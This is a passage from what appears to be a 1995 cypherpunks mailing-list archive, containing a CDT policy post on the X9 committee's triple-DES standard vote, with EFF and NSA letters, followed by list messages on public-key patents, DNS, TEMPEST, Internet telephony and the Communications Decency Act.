years to complete.  Once technical standards are developed, 
the full X9 committee will vote as to whether to implement 
the subcommittee's technical recommendations.

The availability of triple-DES applications received a 
further boost recently with the announcement by AT&T and VLSI 
Technologies that they were developing new data security 
products based on triple-DES. This will presumably provide 
additional options for X9 committee members, but the 
exportability of these products is still in doubt.

The stage is thus set for a further battle between the NSA 
and the X9 committee over the exportability of triple-DES and 
final approval of the X9 standard.  As a sitting member of 
the committee, NSA will presumably continue to lobby against 
efforts by the committee to develop triple-DES applications.  
Furthermore, the banking and financial services industries 
must still persuade the government to allow for the export of 
triple-DES.  

As an opponent of government-escrowed cryptography, CDT 
applauds the recent actions of the X9 committee.  While CDT 
supports the development of a variety of security standards 
and alternatives to DES, we recognize the need of the banking 
and financial services industries to develop temporary stop-
gap solution. CDT will continue to work towards the 
relaxation of export controls on cryptography and will 
support X9 committee members in their efforts to gain the 
ability to export triple-DES applications.  

For more information contact:

Daniel J. Weitzner, Deputy Director       <djw@cdt.org>
Jonah Seiger, Policy Analyst              <jseiger@cdt.org>

+1.202.637.9800

----------------------------------------------------------

GILMORE/WEITZNER LETTER TO X9 COMMITTEE MEMBERS

November 18, 1994

Dear Accredited Standards Committee-X9 Member:

The X9 Committee is currently voting as to whether to 
recommend the development of a standard for triple-DES (ballot number 
X9/94-LB#28).  The Electronic Frontier Foundation (EFF) strongly urges you to 
vote in favor of the triple-DES standard.

EFF supports the development of a variety of new data 
security standards and alternatives to DES.  We believe the triple-DES standard 
provides the best immediate short term alternative because:

        * The basic algorithm, DES, is strong and has been 
          tested repeatedly.

        * There are no known attacks that succeed against 
          triple-DES.

        * It is clearly no less secure than DES.

        * It eliminates the brute-force problem completely by 
          tripling the key length.

        * It runs at high speeds in easy-to-build chips.

        * It can be easily incorporated into existing systems.

NSA's opposition to triple-DES appears to be an indirect attempt to push
Clipper by eliminating credible alternatives. Clipper is not a viable
alternative to triple-DES, and carries substantial liabilities. There has
been no evidence of foreign acceptance of the standard and the skipjact
algorithm is classified. The likelihood of any government accepting secret
standards developed by a foreign security agency is slim. Clinton
Administration efforts, through the NSA, to push Clipper as a domestic
standard over the past two years have failed.  

We urge you to carefully consider the alternatives before you 
cast your ballot.  We believe that the triple-DES issue should be 
decided on its own merits.

Sincerely, 

John Gilmore                            
Board of Directors                      
Electronic Frontier Foundation  

Daniel J. Weitzner
Deputy Policy Director
Electronic Frontier Foundation

-------------------------------------------------------------

NSA LETTER TO X9 COMMITTEE MEMBERS

X9 Member:

I will be casting a NO vote on the NWI for triple-DES, Letter 
Ballot X9/94-LB#28.  The reasons are set forth below.  You 
may find these useful as you determine your position.

Jerry Rainville

                NSA REASONS FOR A NEGATIVE VOTE

While NSA supports the use of DES in the global financial 
sector, we believe that standardization of triple-DES is ill-
advised for a number of reasons.

The financial community should be planning to transition to a 
new generation of cryptographic algorithms.  When DES was 
first introduced, it represented the "only game in town".  It 
supported encryption, authentication, key management, and 
secure hashing applications.  With a broader interest in 
security, the market can now support optimized algorithms by 
application.  Going through the expense of installing a stop-
gap can only serve to delay progress in achieving 
interoperable universal appropriate solutions.

While we understand the appeal of a snap-in upgrade, our 
experience has been that any change is expensive, especially 
one where the requirements on the key management system 
change.  We do not agree that replacing DES with triple-DES 
is significantly less expensive than upgrading to more 
appropriate technology.

Tripling of any algorithm is cryptographically unsound.  
Notice that tripling DES, at best, only doubles the length of 
the cryptovariable (key).  Phrased another way, the DES was 
optimized for security at 56 bits.  We cannot vouch that any 
of the schemes for doubling the cryptovariable length of DES 
truly squares security.

We understand the financial community has concerns with 
current key escrow based encryption, however, we are 
committed to searching for answers to those concerns.  But 
the government is also committed to key escrow encryption, 
and we do not believe that the proposal for triple DES is 
consistent with this objective.

US export control policy does not allow for general export of 
DES for encryption, let alone triple-DES.  Proceeding with 
this NWI would place X9 at odds with this long standing 
policy.  It also violates the newly accepted X9 cryptographic 
policy.

The US government has not endorsed triple-DES; manufacturers 
and users may be reluctant to use triple-DES products for 
fear of possible liability.

Finally, further proliferation of triple-DES is counter to 
national security and economic objectives.  We would welcome 
the opportunity to discuss these concerns with an appropriate 
executive of your institution.

---------------------------------------------------------------------

ABOUT THE CENTER FOR DEMOCRACY AND TECHNOLOGY

The Center for Democracy and Technology is a non-profit public interest
organization. The Center's mission is to develop and advocate public
policies that advance constitutional civil liberties and democratic 
values in new computer and communications technologies. 

Contacting us:

General information on CDT can be obtained by sending mail to <info@cdt.org>

www/ftp/gopher archives are currently under construction, and should be up
and running by the middle of March. 

                                 ###
------------------------------------------------------------------------
   ******    ********    *************
  ********   *********   *************   
  **         **      **       ***               POLICY POST  
  **         **      **       ***               
  **         **      **       ***               February 13, 1995
  **         **      **       ***               Number 2
  ********    *********       ***              
   ******    ********         ***
                
  CENTER FOR DEMOCRACY AND TECHNOLOGY
------------------------------------------------------------------------
  A briefing on public policy issues affecting civil liberties online
------------------------------------------------------------------------
CDT POLICY POST 2/13/95                                     Number 2

CONTENTS: (1) X9 Committee Agrees to Develop 3x DES Encryption Standard
          (2) About the Center for Democracy and Technology

This document may be re-distributed freely providing it remains in its 
entirety.
------------------------------------------------------------------------

X9 COMMITTEE AGREES TO DEVELOP 3x DES ENCRYPTION STANDARD 

Major Setback for NSA

The NSA's efforts to push the adoption the Clipper/Skipjack 
government-escrowed encryption scheme encountered a major 
setback earlier this month with the decision by the 
Accredited Standards Committee X9 to proceed with the 
development of a data security standard based on triple-DES.    

The ASC X9 committee is responsible for setting data security 
standards for the US banking and financial services 
industries.   These industries are heavy users of commercial 
cryptography, and standards developed for this community tend 
to drive the development of applications for the entire 
market.  As a result, the committee's decision to proceed 
with a triple-DES standard has important implications for 
future cryptographic standards and US cryptography policy 
generally.

The NSA, a voting member of the X9 committee, had lobbied 
hard against the proposal.  In a November letter to committee 
members, the NSA threatened to prevent the export of triple-
DES, citing existing US law and potential threats to national 
security (see attached NSA letter).

The decision sets the stage for the development of a next 
generation of security standards based on publicly available, 
non-escrowed encryption schemes.   A battle over the 
exportability of triple-DES applications is also on the 
horizon.

Through export controls on cryptography, the proposed Clipper 
initiative, and interference in the standards setting 
processes, US government policies have consistently sought to 
make strong encryption and other privacy protecting 
technologies unavailable to the general public.  The X9 
decision and development of triple-DES and other alternitives 
to government-escrowed cryptography is an important victory 
in that it will increase the public's access to strong, 
privacy enhancing technologies.

BACKGROUND

Banks and other financial institutions use encryption to 
protect the billions of dollars in transactions and fund 
transfers which flow every day across the world's 
communications networks.  

The current encryption standard used by the banking industry 
is based on DES, which has been available since the early 
1970's.  DES is widely trusted because it has been repeatedly 
tested and is considered by experts to be unbreakable except 
by brute force (trying every possible key combination).  The 
US government has also allowed the limited export of DES.

Despite its popularity, DES is considered to be reaching the 
end of its useful life.   The increasing speed and 
sophistication of computer processing power has begun to 
render DES vulnerable to brute force attacks.  Cryptographers 
have recently demonstrated that DES codes can be cracked in 
as little as three hours with $1 million worth of currently 
available equipment.  As a result, the banking and financial 
services industries have begun to explore alternatives to 
DES.  

Although there are many potential alternatives to DES, 
triple-DES is widely seen as the most practical solution.  
Triple-DES is based on DES, but has been enhanced by 
increasing the key length and by encrypting through multiple 
iterations.   These enhancements make triple-DES less 
vulnerable to brute force attacks.  Triple-DES is also 
popular because it can be easily incorporated into existing 
DES systems and is based on standards and procedures familiar 
to most users.   

NSA SETBACK IS A VICTORY FOR CLIPPER OPPONENTS

In their November letter to X9 committee members, the NSA 
attempted to undermine the attractiveness of triple-DES by 
arguing that it is cryptographically unsound, a potential 
threat to national security, and would not be exportable 
under US law.   The NSA, while offering no specific 
alternative to triple-DES, seemed to be attempting to push 
the committee to adopt the only currently available option -- 
Clipper.

Privacy advocates also lobbied the X9 committee.  In a letter 
sent in advance of the December 1994 ballot, CDT Deputy 
Director Daniel Weitzner (then EFF Deputy Policy Director) 
and EFF board member John Gilmore, an expert in this field, 
sent a letter to X9 committee members urging them to adopt 
the triple-DES standard. A copy of the letter is appended at 
the end of this post.

By agreeing to develop a triple-DES standard, the X9 
committee has clearly and decisively rejected Clipper as a 
solution. This vote thus represents a further repudiation to 
Clipper and yet another victory for opponents of government 
efforts to establish Clipper or other government-escrowed 
solutions as a national standard.

NEXT STEPS

X9F, a subcommittee of the X9 committee, will now develop 
technical standards for implementing triple-DES based 
applications.  This process is expected to take one or two 
years to complete.  Once technical standards are developed, 
the full X9 committee will vote as to whether to implement 
the subcommittee's technical recommendations.

The availability of triple-DES applications received a 
further boost recently with the announcement by AT&T and VLSI 
Technologies that they were developing new data security 
products based on triple-DES. This will presumably provide 
additional options for X9 committee members, but the 
exportability of these products is still in doubt.

The stage is thus set for a further battle between the NSA 
and the X9 committee over the exportability of triple-DES and 
final approval of the X9 standard.  As a sitting member of 
the committee, NSA will presumably continue to lobby against 
efforts by the committee to develop triple-DES applications.  
Furthermore, the banking and financial services industries 
must still persuade the government to allow for the export of 
triple-DES.  

As an opponent of government-escrowed cryptography, CDT 
applauds the recent actions of the X9 committee.  While CDT 
supports the development of a variety of security standards 
and alternatives to DES, we recognize the need of the banking 
and financial services industries to develop temporary stop-
gap solution. CDT will continue to work towards the 
relaxation of export controls on cryptography and will 
support X9 committee members in their efforts to gain the 
ability to export triple-DES applications.  

For more information contact:

Daniel J. Weitzner, Deputy Director       <djw@cdt.org>
Jonah Seiger, Policy Analyst              <jseiger@cdt.org>

+1.202.637.9800

----------------------------------------------------------

GILMORE/WEITZNER LETTER TO X9 COMMITTEE MEMBERS

November 18, 1994

Dear Accredited Standards Committee-X9 Member:

The X9 Committee is currently voting as to whether to 
recommend the development of a standard for triple-DES (ballot number 
X9/94-LB#28).  The Electronic Frontier Foundation (EFF) strongly urges you to 
vote in favor of the triple-DES standard.

EFF supports the development of a variety of new data 
security standards and alternatives to DES.  We believe the triple-DES standard 
provides the best immediate short term alternative because:

        * The basic algorithm, DES, is strong and has been 
          tested repeatedly.

        * There are no known attacks that succeed against 
          triple-DES.

        * It is clearly no less secure than DES.

        * It eliminates the brute-force problem completely by 
          tripling the key length.

        * It runs at high speeds in easy-to-build chips.

        * It can be easily incorporated into existing systems.

NSA's opposition to triple-DES appears to be an indirect attempt to push
Clipper by eliminating credible alternatives. Clipper is not a viable
alternative to triple-DES, and carries substantial liabilities. There has
been no evidence of foreign acceptance of the standard and the skipjact
algorithm is classified. The likelihood of any government accepting secret
standards developed by a foreign security agency is slim. Clinton
Administration efforts, through the NSA, to push Clipper as a domestic
standard over the past two years have failed.  

We urge you to carefully consider the alternatives before you 
cast your ballot.  We believe that the triple-DES issue should be 
decided on its own merits.

Sincerely, 

John Gilmore                            
Board of Directors                      
Electronic Frontier Foundation  

Daniel J. Weitzner
Deputy Policy Director
Electronic Frontier Foundation

-------------------------------------------------------------

NSA LETTER TO X9 COMMITTEE MEMBERS

X9 Member:

I will be casting a NO vote on the NWI for triple-DES, Letter 
Ballot X9/94-LB#28.  The reasons are set forth below.  You 
may find these useful as you determine your position.

Jerry Rainville

                NSA REASONS FOR A NEGATIVE VOTE

While NSA supports the use of DES in the global financial 
sector, we believe that standardization of triple-DES is ill-
advised for a number of reasons.

The financial community should be planning to transition to a 
new generation of cryptographic algorithms.  When DES was 
first introduced, it represented the "only game in town".  It 
supported encryption, authentication, key management, and 
secure hashing applications.  With a broader interest in 
security, the market can now support optimized algorithms by 
application.  Going through the expense of installing a stop-
gap can only serve to delay progress in achieving 
interoperable universal appropriate solutions.

While we understand the appeal of a snap-in upgrade, our 
experience has been that any change is expensive, especially 
one where the requirements on the key management system 
change.  We do not agree that replacing DES with triple-DES 
is significantly less expensive than upgrading to more 
appropriate technology.

Tripling of any algorithm is cryptographically unsound.  
Notice that tripling DES, at best, only doubles the length of 
the cryptovariable (key).  Phrased another way, the DES was 
optimized for security at 56 bits.  We cannot vouch that any 
of the schemes for doubling the cryptovariable length of DES 
truly squares security.

We understand the financial community has concerns with 
current key escrow based encryption, however, we are 
committed to searching for answers to those concerns.  But 
the government is also committed to key escrow encryption, 
and we do not believe that the proposal for triple DES is 
consistent with this objective.

US export control policy does not allow for general export of 
DES for encryption, let alone triple-DES.  Proceeding with 
this NWI would place X9 at odds with this long standing 
policy.  It also violates the newly accepted X9 cryptographic 
policy.

The US government has not endorsed triple-DES; manufacturers 
and users may be reluctant to use triple-DES products for 
fear of possible liability.

Finally, further proliferation of triple-DES is counter to 
national security and economic objectives.  We would welcome 
the opportunity to discuss these concerns with an appropriate 
executive of your institution.

---------------------------------------------------------------------

ABOUT THE CENTER FOR DEMOCRACY AND TECHNOLOGY

The Center for Democracy and Technology is a non-profit public interest
organization. The Center's mission is to develop and advocate public
policies that advance constitutional civil liberties and democratic 
values in new computer and communications technologies. 

Contacting us:

General information on CDT can be obtained by sending mail to <info@cdt.org>

www/ftp/gopher archives are currently under construction, and should be up
and running by the middle of March. 

                                 ###




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wcs@anchor.ho.att.com
Date: Mon, 13 Feb 95 12:46:28 PST
To: cypherpunks@toad.com
Subject: Re: standards...
Message-ID: <9502132044.AA24186@anchor.ho.att.com>
MIME-Version: 1.0
Content-Type: text/plain


> > AFAIK, RSA is the only feasible PK scheme available.  There's eliptic
> > curves, of course, but that's patented.
> There are plenty of others, like Rabin's scheme, that are quite
> practical, but just not used because they are all collectively
> patented. After that patent expires in '97 things may change.

There are different uses for public-key systems, and some systems
support some but not all of the uses.  For instance,
Diffie-Hellman is useful for key exchage (and patented till 1997),
and the NIST/NSA's DSS Digital Signature Standard is useful for signatures,
especially if you like subliminal channels in your signatures :-), 
though the patent status depends on whether you believe NIST or RSA ....




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Rothenburg Walking-Owl <rrothenb@ic.sunysb.edu>
Date: Mon, 13 Feb 95 09:52:55 PST
To: schneier@chinet.chinet.com
Subject: Re: Factoring - State of the Art and Predictions
In-Reply-To: <m0rdnqt-000k5xC@mailbox.mcs.com>
Message-ID: <199502131750.MAA18574@libws4.ic.sunysb.edu>
MIME-Version: 1.0
Content-Type: text/plain



My knowledge of number theory is negligable, but I've got this one obvious
comment: use algorithms where factoring is not a weakness.

Isn't LUC safe from factoring?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Wei Dai" <weidai@eskimo.com>
Date: Mon, 13 Feb 95 13:07:01 PST
To: cypherpunks@toad.com
Subject: Re: Is Cyberspace Rich Enough?
Message-ID: <199502132106.AA22391@mail.eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

> That theme is this: Is cyberspace, or the Net/Web/Etc., sufficiently
> rich or complex to meet our needs?

 [deleted]

> Consider how the abstractions of the World Wide Web, URLs, HTML, HTTP,
> and Web browsers have *increased the size of cyberspace* rather
> dramatically in just the past two years. More places to visit, more
> interconnectedness, more difficulties in controlling access to stuff,
> etc. Home pages containing banned material are proliferating (a la the
> Homolka-Teale ritualistic cannibalism trial in Canada, the Scientology
> material, and so on--this is not the place for me to recap this).
> Sure, ftp sites used to do this pretty well; in fact, I'm considering
> ftp sites in this "evolution" toward greater complexity (in the
> richness sense).

I agree that cyberspace is certainly becoming more complex and
interconnected.  However, just as a complex ecosystem is not necessarily
more stable than a simple one, and a complex cipher is not necessarily
more secure than a simple one, greater complexity in cyberspace does not
necessarily imply that it is less vulnerable to to centralized control.

[more stuff deleted]

> What Cypherpunks should be pushing for, in my view, is this increased
> dimensionality. More places to stick things, more places to escape
> central control, and more degrees of freedom (which has a nice dual
> meaning I once used as the working title for a novel I was working
> on).

But if you wanted to exert greater control over others, you would also
be pushing for increased dimensionality, because that shrinks the world
and moves everyone closer to you.  If you look at history, increased
connectivity has always been necessary for increased central control.
What I am saying is that increased connectivity alone does not
necessarily favor decentralization.  What makes the difference is the
details -- the nature of the connectivity.

> Is Cyberspace already rich enough (= high enough dimensionality) so
> that central control cannot be reestablished (to the extent it ever
> existed)?
>
> Many of this think that it probably already is past this point, that
> the "point of no return" has been reached. After all, the Soviets
> couldn't stop samizdats, the Chinese couldn't stop fax machines, and
> the Americans can't stop drug use, so what hope is there in
> controlling modems, crypto, cellular phones, satellites, Web links,
> stegonography, terabytes of data flowing unobstructed across borders,
> and so on. Just to "stop the Net" would disrupt the entire financial
> system, which not even Clinton or the next (Republican) President
> would be tempted to do....they might as well launch a nuclear war as
> try to shut down this "anarchic" ( = high dimensionality) system.

I'm not quite so optimistic.  One way to control a distributed system
such as the Internet would be to use a distributed method.  I.e., use
something like the Internet Worm, but a thousand times subtler and more
powerful.  There is no need for them to "stop the Net", just to subvert
a substantial part of it.

Wei Dai

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLz/I0Tl0sXKgdnV5AQGEewP7BGVcIdtKv5UIh8z3ydSoMdOdvLyBxww3
N3f4NKaXTwS6PPfdmRafcN7i3mKEDIlB6CKBBEL5qV2GkDpmTi9rehD2q5hZFzEX
vdHYg8k/YRo8ZNnLdaelZO7EPFpFwX3XCeyd2Ap6efzrr7djX98ckJWb5ZMnK/Xp
BOLeEwxTF6Y=
=hcI1
-----END PGP SIGNATURE-----

E-mail: Wei Dai <weidai@eskimo.com>   URL: "http://www.eskimo.com/~weidai"
=================== Exponential Increase of Complexity ===================
--> singularity --> atoms --> macromolecules --> biological evolution
--> central nervous systems --> symbolic communication --> homo sapiens
--> digital computers --> internetworking --> close-coupled automation
--> broadband brain-to-net connections --> artificial intelligence
--> distributed consciousness --> group minds --> ? ? ?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wcs@anchor.ho.att.com
Date: Mon, 13 Feb 95 13:14:18 PST
To: cypherpunks@toad.com
Subject: perry@imsi.comRe: Does PGP scale well?
Message-ID: <9502132105.AA24452@anchor.ho.att.com>
MIME-Version: 1.0
Content-Type: text/plain


> > I was just reading RFC1034 about DNS, and one thing I noted was that
> > there is a "reverse lookup" feature.  [....]
> > The RFC did not make it very clear how this is done.  Does this use a
> > "flat" database?
> 
> No. Its fully distributed. The fact that networks are assigned in
> heirarchical chunks should explain how its done, and why the bytes get
> reversed for the lookup. As an example, MIT owns network 18, which is
> to say that all MIT addresses are 18.XXX.XXX.XXX, and 18.IN-ADDR.ARPA
> is a server at MIT. MIT may have sub-servers beyond that level, but
> DNS makes us oblivious to this.

Of course, that's more useful for MIT, which owns Network 18,
than for the thousands of people on networks 192.xxx.xxx;
reverse lookups don't seem as reliable for Class C.
On the site I run, I implement reverse lookups for my subnet,
and the folks who run our larger internal net have pointers that 
know how to find it.  But DNS would work for forward lookups
even if the reverse weren't maintained, or deliberately omitted 
some parts for security/predictability reasons.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wcs@anchor.ho.att.com
Date: Mon, 13 Feb 95 13:54:28 PST
To: cypherpunks@toad.com
Subject: Re:  TEMPEST Paper by Former Civilian (1/2)
Message-ID: <9502132110.AA24519@anchor.ho.att.com>
MIME-Version: 1.0
Content-Type: text/plain


Sigh.  Some anonymous poster drags up "Christopher Seline"'s
wildly inaccurate article about TEMPEST.  Aside from having a reverse-
engineered deacronymization of TEMPEST (which isn't an acronym and
isn't about Transient Electromagnetic Pulses), misunderstanding 
TEMPEST certification, not getting its legalities right,
it's in general just plain confused and sensationalist.

			Bill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Rothenburg Walking-Owl <rrothenb@ic.sunysb.edu>
Date: Mon, 13 Feb 95 10:14:21 PST
To: lile@art.net (Lile Elam)
Subject: Re: bill alert...
In-Reply-To: <199502130515.VAA14482@art.net>
Message-ID: <199502131813.NAA20427@libws4.ic.sunysb.edu>
MIME-Version: 1.0
Content-Type: text/plain



> Do you think this will force folks into using encryption?
> If I was a sysop, I sure would have all my users using
> encryption... :)

Which bill do you mean (aside from the one in the whitehouse)?

Why force users to do anything. There are other measures, such as running
the system on a secure file/device/drive system.  Well, that would only
help prevent anyone who yeggs your physical system from looking at it--
could even put you in more legal doo-doo that if the users encrypted it.

Getting users to encrypt their mail is pointless as a defense against
this bill, since the authorities' usual way of 'busting' systems is to
call in, become just another user and download (or get a minor to download)
'evil' files or messages.

Rob




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@netcom.com (Timothy C. May)
Date: Mon, 13 Feb 95 14:22:33 PST
To: weidai@eskimo.com
Subject: Re: Is Cyberspace Rich Enough?
In-Reply-To: <199502132106.AA22391@mail.eskimo.com>
Message-ID: <199502132123.NAA15909@netcom4.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Wei Dai wrote:

> I agree that cyberspace is certainly becoming more complex and
> interconnected.  However, just as a complex ecosystem is not necessarily
> more stable than a simple one, and a complex cipher is not necessarily
> more secure than a simple one, greater complexity in cyberspace does not
> necessarily imply that it is less vulnerable to to centralized control.

No, it doesn't ncecessarily imply less vulnerability, but the two are
empirically correlated. Monocultures are usually easier to control
than in systems where the citizen-units have rich connections and
diverse options.

> But if you wanted to exert greater control over others, you would also
> be pushing for increased dimensionality, because that shrinks the world
> and moves everyone closer to you.  If you look at history, increased

It's always dangerous reasoning from imprecise analogies, and all the
more dangerous reasoning about the mental images others have of such
analogies. Thus, I won't dispute Wei Dai's image of "moving closer" to
the government except to say that as the space shrinks, _many people_
move closer...and this means transactions not visible to the
government _also_ become more common.

In other words, one may be only "2 Internet handshakes from Al Gore,"
but this doesn't give Al Gore control over Joe User's encrypted
transactions with Ivan Hackerovich. 

> connectivity has always been necessary for increased central control.
> What I am saying is that increased connectivity alone does not
> necessarily favor decentralization.  What makes the difference is the
> details -- the nature of the connectivity.

Yes, of course. The nature is critical, and I would not claim
otherwise. (This is another reason long posts are often losers in the
Ratings Game: the longer the post the more nits can be picked. And so
threads often devolve into word games. And if I try to fix things by
writing even _more_, it just gets worse! :-} )

> I'm not quite so optimistic.  One way to control a distributed system
> such as the Internet would be to use a distributed method.  I.e., use
> something like the Internet Worm, but a thousand times subtler and more
> powerful.  There is no need for them to "stop the Net", just to subvert
> a substantial part of it.

In fact, I almost mentioned the Morris Worm, but held back. For one
thing, in a crypto-dominated, reputation-centered era, such rogue
programs are probably less likely. Safe computing, etc.

I'm less fearful that the Net will be attacked in this way than that
liability laws will be used to try to scare people into compliance. 

But these are other topics, which I'll treat separately.

--Tim May


-- 
..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,  
tcmay@netcom.com       | anonymous networks, digital pseudonyms, zero
                       | knowledge, reputations, information markets, 
W.A.S.T.E.: Aptos, CA  | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo@toad.com with body message of only: 
subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Richard F. Dutcher" <rfdutcher@igc.apc.org>
Date: Mon, 13 Feb 95 19:21:29 PST
To: cypherpunks@toad.com
Subject: (Fwd) Returned mail
Message-ID: <199502140322.TAA14989@igc3.igc.apc.org>
MIME-Version: 1.0
Content-Type: text/plain



> Date:          Sat, 11 Feb 1995 01:41:09 -0600
> To:            cypherpunks@toad.com
> From:          dls@mcs.com (David Sallach)
> >
> >"Free" speech has always been a balancing act.  The founders
> >certainly didn't intend to provide "free" speech for blacks and
> >women.  
> 
>  The Founders created a larger space for free speech than had ever
> existed.  Slaves were deprived of many freedoms including speech, of course,
> but women and free blacks were included in the Bill of Rights and exercised
> free speech, frequently compellingly.  
> 
And were frequently thrown in jail for their pains - note especially 
the experiences of the early feminists [anachronistic label alert].  
And let us not forget what happened to the Mormons ...

> Check out Frederick Douglass' practicing oration while still a
> slave, and then winning his freedom to become one of the greatest
> abolitionist orators.  Consider the appreciation of diversity of thought and
> speech manifested by Jefferson, Lincoln and many other American political
> leaders.
> >

And Douglass spent a good portion of his life as a refugee in a 
protected enclave [Boston] where he had powerful friends to keep him 
from being arrested.

I'm not dissing the Founders, or the Bill of Rights -- just the 
simplified pap their invocation in most discourse has become.  I was 
trained in high school as a scientist, and in college as an 
historian, and in both instances to value the messy contingent 
realities over the tempting simplicities of ideology and theory.

And there are few contingent realities messier than the law ...

> > . . . "They" have never liked "free" speech ... :-(
> 
> Invoking poitically 'correct' stereotypes does not strengthen your
> argument.
> 
> David Sallach

Irony-impaired, are we?

There's a Polish word, used by most of the populace after the 1979
coup to refer to the army and apparat, that is usually translated as
"them."  I [probably incorrectly] recall it as "Oni" -- would you
prefer it?

My own first encounter with the term "politically [in]correct" was
among 70's feminists, who used it ironically, to tell people they
needed a vacation/to get laid/to get a grip.  Would that Newt used it 
that way ...


===================================
Rich Dutcher, San Francisco Greens
P.O. Box 77005, San Francisco, California 94107 USA

"That's libertarians for you - anarchists who want police protection from their slaves."
                          Kim Stanley Robinson, "Green Mars"

Greens, of course, only enslave plants - so weed-whackers work better than cops ...
====================================





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Mon, 13 Feb 95 11:26:14 PST
To: cypherpunks@toad.com
Subject: Fun with numbers: Payment Switches
Message-ID: <v01510100ab651dd4939c@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


Saw this on buyinfo. At first blush it reminds me of the old CMU "Billing
Server" without the gopher...

>From: treese@OpenMarket.com
>To: www-buyinfo@allegra.att.com
>Subject: technical paper: Payment Switches for Open Networks
>Date: Mon, 13 Feb 1995 13:24:48 -0500
>Original-From: Win Treese <treese@OpenMarket.com>
>
>
>"Payment Switches for Open Networks" by David K. Gifford, Lawrence
>C. Stewart, Andrew C. Payne, and G. Winfield Treese is a technical
>paper describing Open Market's Internet payment switch.  It will be
>presented at IEEE COMPCON '95 (San Francisco, March 5-9). A preprint
>is available from http://www.openmarket.com/about/technical/.
>
>Here is the abstract from the paper:
>
>    We describe the first operational Internet payment switch that
>    provides real-time authorization suitable for direct use by merchant
>    servers.  A payment switch is a server that creates digital
>    representations of conventional financial instruments, and forwards
>    authentic payment orders on these instruments to their corresponding
>    conventional financial networks and institutions.  Our payment switch
>    provides support for time-based and item-based pricing, implements
>    switch based authorization and settlement aggregation for
>    micro-payments, and includes an extensive customer support system in
>    order to provide a high level of customer confidence in electronic
>    commerce.  Fraud control is based on a transaction-specific
>    multi-level security model that accommodates existing Internet
>    browsers.  Multiple authentication technologies are applied to every
>    transaction.
>
>More information about COMPCON '95 can be found at
> http://www.hal.com:80/compcon/
>
>Win Treese
>Open Market, Inc.
>treese@OpenMarket.com
>

-----------------
Robert Hettinga  (rah@shipwright.com) "There is no difference between someone
Shipwright Development Corporation     who eats too little and sees Heaven and
44 Farquhar Street                       someone who drinks too much and sees
Boston, MA 02331 USA                       snakes." -- Bertrand Russell
(617) 323-7923






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: usviszpz@ibmmail.com
Date: Mon, 13 Feb 95 11:48:03 PST
To: cypherpunks@toad.com
Subject: WSJ article on Internet Telephony
Message-ID: <9502131947.AA17236@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Friday's Wall Street Journel (Feb. 10, page B1, col 6) includes an article on
"Internet Phone," a new software program that supposedly offers intelligible
real-time voice communication over the net.

The article cites potential cost savings of this approach as the primary
benefit of this technology: long-distance voice calls in on-line time instead
of $$/minute over AT&T will be much, much cheaper. Since Internet accounts for
many of us are of low or negligable cost, that angle is indeed significant, but
for the readers of this list it seems to me that the more interesting
possibilities here lie in the potential for bypassing the phone network
and leveraging existing privacy/authentication/anonymity tools for use with
voice communications as well as data. I imagine any privacy buff would like the
option of routing his/her calls out of the (Federally-mandated-wiretap-
compatible) normal phone system. Can this represent a development path for that
option?

{The producers of Internet Phone are listed as VocalTec in Tel Aviv, with
offices in Northvale, NJ; the software is currently $49 (although a demo
version allowing unlimited 3-min calls is free) and currently requires a 14.4
kps modem with a Windows 486, sound card & microphone. No Email address for the
company was given.)

For those for whom this is already old news, I would like to ask: any idea if
this technology is related in any way to VoicePGP? If not, any thoughts on the
development ramifications of this for VoicePGP?

If anybody wants the full text of the article and does not have easy access to
the WSJ, I can get it onto an Email. It may take a little while, though; I do
not have OCR and I'm not the fastest typist.

Regards all,

C.Y.

 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Dave Banisar" <banisar@epic.org>
Date: Mon, 13 Feb 95 13:57:36 PST
To: "Cypherpunks List" <cypherpunks@toad.com>
Subject: EPIC to Debate Exon on CNN
Message-ID: <n1419433051.47954@epic.org>
MIME-Version: 1.0
Content-Type: text/plain




CNN's 6:00 p.m. (EST) news broadcast tonight (2/13) will include a
segment on S. 314, "The Communications Decency Act," introduced by
Sen. James Exon (D-NE).  Judy Woodruff will moderate a discussion 
of the bill with Sen. Exon and Marc Rotenberg of the Electronic
Privacy Information Center (EPIC).



_________________________________________________________________________
Subject: EPIC to Debate Exon on CNN
_________________________________________________________________________
David Banisar (Banisar@epic.org)       * 202-544-9240 (tel)
Electronic Privacy Information Center * 202-547-5482 (fax)
666 Pennsylvania Ave, SE, Suite 301  * ftp/gopher/wais cpsr.org 
Washington, DC 20003                * HTTP://epic.digicash.com/epic




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Connie Sadler <SADLER_C@HOSP.STANFORD.EDU>
Date: Mon, 13 Feb 95 15:39:10 PST
To: cypherpunks@toad.com
Subject: EPIC to Debate Exon on CNN
Message-ID: <B128ZVPYMCNQB*SADLER_C@HOSP.STANFORD.EDU>
MIME-Version: 1.0
Content-Type: text/plain



Subject: EPIC to Debate Exon on CNN
Date: Mon, 13 Feb 1995 15:36:11 PDT
A1-type: DOCUMENT
Importance: normal



>CNN's 6:00 p.m. (EST) news broadcast tonight (2/13) will include a
>segment on S. 314, "The Communications Decency Act," introduced by
